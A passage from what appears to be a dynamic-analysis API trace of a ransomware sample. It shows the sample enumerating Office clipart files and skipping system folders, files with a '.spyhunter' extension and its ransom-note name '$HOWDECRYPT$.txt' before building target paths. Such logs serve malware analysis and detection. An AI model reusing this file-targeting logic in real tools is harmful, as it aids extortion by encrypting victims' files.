(HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c14ff8 [0097.546] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c40) returned 0x2c310e0 [0097.546] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.546] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="Windows") returned -1 [0097.546] lstrlenW (lpString="Windows") returned 7 [0097.547] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="$Recycle.bin") returned 1 [0097.547] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.547] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="System Volume Information") returned -1 [0097.547] lstrlenW (lpString="System Volume Information") returned 25 [0097.547] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 67 [0097.547] StrStrIW (lpFirst="EN00006_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.547] lstrcmpW (lpString1="EN00006_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.547] lstrcmpW (lpString1="EN00006_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 67 [0097.547] GetProcessHeap () returned 0x2c0000 [0097.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c150c8 [0097.547] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c48) returned 0x2c310e0 [0097.547] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.547] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="Windows") returned -1 [0097.547] lstrlenW (lpString="Windows") returned 7 [0097.547] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="$Recycle.bin") returned 1 [0097.547] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.547] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="System Volume Information") returned -1 [0097.547] lstrlenW (lpString="System Volume Information") returned 25 [0097.547] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 67 [0097.547] StrStrIW (lpFirst="EN00202_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.547] lstrcmpW (lpString1="EN00202_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.547] lstrcmpW (lpString1="EN00202_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 67 [0097.547] GetProcessHeap () returned 0x2c0000 [0097.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15198 [0097.548] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c50) returned 0x2c310e0 [0097.548] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.548] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="Windows") returned -1 [0097.548] lstrlenW (lpString="Windows") returned 7 [0097.548] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="$Recycle.bin") returned 1 [0097.548] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.548] lstrcmpiW (lpString1="EN00222_.WMF", lpString2="System Volume Information") returned -1 [0097.548] lstrlenW (lpString="System Volume Information") returned 25 [0097.548] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 67 [0097.548] StrStrIW (lpFirst="EN00222_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.548] lstrcmpW (lpString1="EN00222_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.548] lstrcmpW (lpString1="EN00222_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.548] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 67 [0097.548] GetProcessHeap () returned 0x2c0000 [0097.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15268 [0097.548] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c58) returned 0x2c310e0 [0097.548] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.548] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="Windows") returned -1 [0097.548] lstrlenW (lpString="Windows") returned 7 [0097.548] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="$Recycle.bin") returned 1 [0097.548] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.548] lstrcmpiW (lpString1="EN00242_.WMF", lpString2="System Volume Information") returned -1 [0097.548] lstrlenW (lpString="System Volume Information") returned 25 [0097.549] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 67 [0097.549] StrStrIW (lpFirst="EN00242_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.549] lstrcmpW (lpString1="EN00242_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.549] lstrcmpW (lpString1="EN00242_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.549] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 67 [0097.549] GetProcessHeap () returned 0x2c0000 [0097.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15338 [0097.549] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c60) returned 0x2c310e0 [0097.549] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.549] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="Windows") returned -1 [0097.549] lstrlenW (lpString="Windows") returned 7 [0097.552] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="$Recycle.bin") returned 1 [0097.552] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.552] lstrcmpiW (lpString1="EN00319_.WMF", lpString2="System Volume Information") returned -1 [0097.552] lstrlenW (lpString="System Volume Information") returned 25 [0097.552] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 67 [0097.552] StrStrIW (lpFirst="EN00319_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.552] lstrcmpW (lpString1="EN00319_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.552] lstrcmpW (lpString1="EN00319_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 67 [0097.552] GetProcessHeap () returned 0x2c0000 [0097.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15408 [0097.552] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c68) returned 0x2c310e0 [0097.552] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.552] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="Windows") returned -1 [0097.552] lstrlenW (lpString="Windows") returned 7 [0097.552] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="$Recycle.bin") returned 1 [0097.552] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.552] lstrcmpiW (lpString1="EN00320_.WMF", lpString2="System Volume Information") returned -1 [0097.552] lstrlenW (lpString="System Volume Information") returned 25 [0097.552] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 67 [0097.552] StrStrIW (lpFirst="EN00320_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.552] lstrcmpW (lpString1="EN00320_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.552] lstrcmpW (lpString1="EN00320_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.553] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 67 [0097.553] GetProcessHeap () returned 0x2c0000 [0097.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c154d8 [0097.553] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c70) returned 0x2c310e0 [0097.553] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.553] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="Windows") returned -1 [0097.553] lstrlenW (lpString="Windows") returned 7 [0097.553] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="$Recycle.bin") returned 1 [0097.553] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.553] lstrcmpiW (lpString1="EN00397_.WMF", lpString2="System Volume Information") returned -1 [0097.553] lstrlenW (lpString="System Volume Information") returned 25 [0097.553] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 67 [0097.553] StrStrIW (lpFirst="EN00397_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.553] lstrcmpW (lpString1="EN00397_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.553] lstrcmpW (lpString1="EN00397_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.553] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 67 [0097.553] GetProcessHeap () returned 0x2c0000 [0097.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c155a8 [0097.553] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c78) returned 0x2c310e0 [0097.553] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.553] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="Windows") returned -1 [0097.553] lstrlenW (lpString="Windows") returned 7 [0097.553] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="$Recycle.bin") returned 1 [0097.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.554] lstrcmpiW (lpString1="EN00902_.WMF", lpString2="System Volume Information") returned -1 [0097.554] lstrlenW (lpString="System Volume Information") returned 25 [0097.554] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 67 [0097.554] StrStrIW (lpFirst="EN00902_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.554] lstrcmpW (lpString1="EN00902_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.554] lstrcmpW (lpString1="EN00902_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 67 [0097.554] GetProcessHeap () returned 0x2c0000 [0097.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15678 [0097.554] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c80) returned 0x2c310e0 [0097.554] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.554] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="Windows") returned -1 [0097.554] lstrlenW (lpString="Windows") returned 7 [0097.554] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="$Recycle.bin") returned 1 [0097.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.554] lstrcmpiW (lpString1="EXPLR_01.MID", lpString2="System Volume Information") returned -1 [0097.554] lstrlenW (lpString="System Volume Information") returned 25 [0097.554] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 67 [0097.554] StrStrIW (lpFirst="EXPLR_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.554] lstrcmpW (lpString1="EXPLR_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.554] lstrcmpW (lpString1="EXPLR_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 67 [0097.554] GetProcessHeap () returned 0x2c0000 [0097.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15748 [0097.554] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c88) returned 0x2c310e0 [0097.554] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.555] lstrcmpiW (lpString1="FALL_01.MID", lpString2="Windows") returned -1 [0097.555] lstrlenW (lpString="Windows") returned 7 [0097.555] lstrcmpiW (lpString1="FALL_01.MID", lpString2="$Recycle.bin") returned 1 [0097.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.555] lstrcmpiW (lpString1="FALL_01.MID", lpString2="System Volume Information") returned -1 [0097.555] lstrlenW (lpString="System Volume Information") returned 25 [0097.555] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 66 [0097.555] StrStrIW (lpFirst="FALL_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.555] lstrcmpW (lpString1="FALL_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.555] lstrcmpW (lpString1="FALL_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FALL_01.MID") returned 66 [0097.555] GetProcessHeap () returned 0x2c0000 [0097.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x2c15818 [0097.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c90) returned 0x2c310e0 [0097.555] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.555] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="Windows") returned -1 [0097.555] lstrlenW (lpString="Windows") returned 7 [0097.555] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="$Recycle.bin") returned 1 [0097.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.555] lstrcmpiW (lpString1="FD00074_.WMF", lpString2="System Volume Information") returned -1 [0097.555] lstrlenW (lpString="System Volume Information") returned 25 [0097.555] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 67 [0097.555] StrStrIW (lpFirst="FD00074_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.556] lstrcmpW (lpString1="FD00074_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.556] lstrcmpW (lpString1="FD00074_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 67 [0097.556] GetProcessHeap () returned 0x2c0000 [0097.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c158e8 [0097.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1c98) returned 0x2c310e0 [0097.556] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.556] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="Windows") returned -1 [0097.556] lstrlenW (lpString="Windows") returned 7 [0097.556] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="$Recycle.bin") returned 1 [0097.556] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.556] lstrcmpiW (lpString1="FD00076_.WMF", lpString2="System Volume Information") returned -1 [0097.556] lstrlenW (lpString="System Volume Information") returned 25 [0097.556] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 67 [0097.556] StrStrIW (lpFirst="FD00076_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.556] lstrcmpW (lpString1="FD00076_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.556] lstrcmpW (lpString1="FD00076_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF") returned 67 [0097.556] GetProcessHeap () returned 0x2c0000 [0097.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c159b8 [0097.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ca0) returned 0x2c310e0 [0097.556] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.556] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="Windows") returned -1 [0097.556] lstrlenW (lpString="Windows") returned 7 [0097.556] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="$Recycle.bin") returned 1 [0097.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.557] lstrcmpiW (lpString1="FD00077_.WMF", lpString2="System Volume Information") returned -1 [0097.557] lstrlenW (lpString="System Volume Information") returned 25 [0097.557] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 67 [0097.557] StrStrIW (lpFirst="FD00077_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.557] lstrcmpW (lpString1="FD00077_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.557] lstrcmpW (lpString1="FD00077_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF") returned 67 [0097.557] GetProcessHeap () returned 0x2c0000 [0097.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15a88 [0097.557] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1ca8) returned 0x2c310e0 [0097.557] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.557] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="Windows") returned -1 [0097.557] lstrlenW (lpString="Windows") returned 7 [0097.557] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="$Recycle.bin") returned 1 [0097.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.557] lstrcmpiW (lpString1="FD00086_.WMF", lpString2="System Volume Information") returned -1 [0097.557] lstrlenW (lpString="System Volume Information") returned 25 [0097.565] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 67 [0097.618] StrStrIW (lpFirst="FD00086_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.619] lstrcmpW (lpString1="FD00086_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.619] lstrcmpW (lpString1="FD00086_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.619] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 67 [0097.619] GetProcessHeap () returned 0x2c0000 [0097.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15b58 [0097.619] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cb0) returned 0x2c310e0 [0097.619] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.619] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="Windows") returned -1 [0097.619] lstrlenW (lpString="Windows") returned 7 [0097.619] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="$Recycle.bin") returned 1 [0097.619] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.619] lstrcmpiW (lpString1="FD00090_.WMF", lpString2="System Volume Information") returned -1 [0097.619] lstrlenW (lpString="System Volume Information") returned 25 [0097.619] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 67 [0097.619] StrStrIW (lpFirst="FD00090_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.619] lstrcmpW (lpString1="FD00090_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.619] lstrcmpW (lpString1="FD00090_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.619] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 67 [0097.619] GetProcessHeap () returned 0x2c0000 [0097.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15c28 [0097.619] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cb8) returned 0x2c310e0 [0097.619] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.619] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="Windows") returned -1 [0097.619] lstrlenW (lpString="Windows") returned 7 [0097.619] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="$Recycle.bin") returned 1 [0097.620] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.620] lstrcmpiW (lpString1="FD00096_.WMF", lpString2="System Volume Information") returned -1 [0097.620] lstrlenW (lpString="System Volume Information") returned 25 [0097.620] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 67 [0097.620] StrStrIW (lpFirst="FD00096_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.620] lstrcmpW (lpString1="FD00096_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.620] lstrcmpW (lpString1="FD00096_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 67 [0097.620] GetProcessHeap () returned 0x2c0000 [0097.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15cf8 [0097.620] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cc0) returned 0x2c310e0 [0097.620] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.620] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="Windows") returned -1 [0097.620] lstrlenW (lpString="Windows") returned 7 [0097.620] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="$Recycle.bin") returned 1 [0097.620] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.620] lstrcmpiW (lpString1="FD00296_.WMF", lpString2="System Volume Information") returned -1 [0097.620] lstrlenW (lpString="System Volume Information") returned 25 [0097.620] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 67 [0097.620] StrStrIW (lpFirst="FD00296_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.620] lstrcmpW (lpString1="FD00296_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.620] lstrcmpW (lpString1="FD00296_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned 67 [0097.620] GetProcessHeap () returned 0x2c0000 [0097.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15dc8 [0097.621] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cc8) returned 0x2c310e0 [0097.621] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.621] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="Windows") returned -1 [0097.621] lstrlenW (lpString="Windows") returned 7 [0097.621] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="$Recycle.bin") returned 1 [0097.621] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.621] lstrcmpiW (lpString1="FD00297_.WMF", lpString2="System Volume Information") returned -1 [0097.621] lstrlenW (lpString="System Volume Information") returned 25 [0097.623] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 67 [0097.625] StrStrIW (lpFirst="FD00297_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.625] lstrcmpW (lpString1="FD00297_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.625] lstrcmpW (lpString1="FD00297_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 67 [0097.625] GetProcessHeap () returned 0x2c0000 [0097.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1c250 [0097.625] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cc8) returned 0x2c310e0 [0097.625] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.625] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="Windows") returned -1 [0097.625] lstrlenW (lpString="Windows") returned 7 [0097.625] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="$Recycle.bin") returned 1 [0097.625] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.625] lstrcmpiW (lpString1="FD00306_.WMF", lpString2="System Volume Information") returned -1 [0097.625] lstrlenW (lpString="System Volume Information") returned 25 [0097.625] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 67 [0097.625] StrStrIW (lpFirst="FD00306_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.625] lstrcmpW (lpString1="FD00306_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.625] lstrcmpW (lpString1="FD00306_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.625] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned 67 [0097.625] GetProcessHeap () returned 0x2c0000 [0097.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c15e98 [0097.625] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1cd0) returned 0x2c310e0 [0097.625] 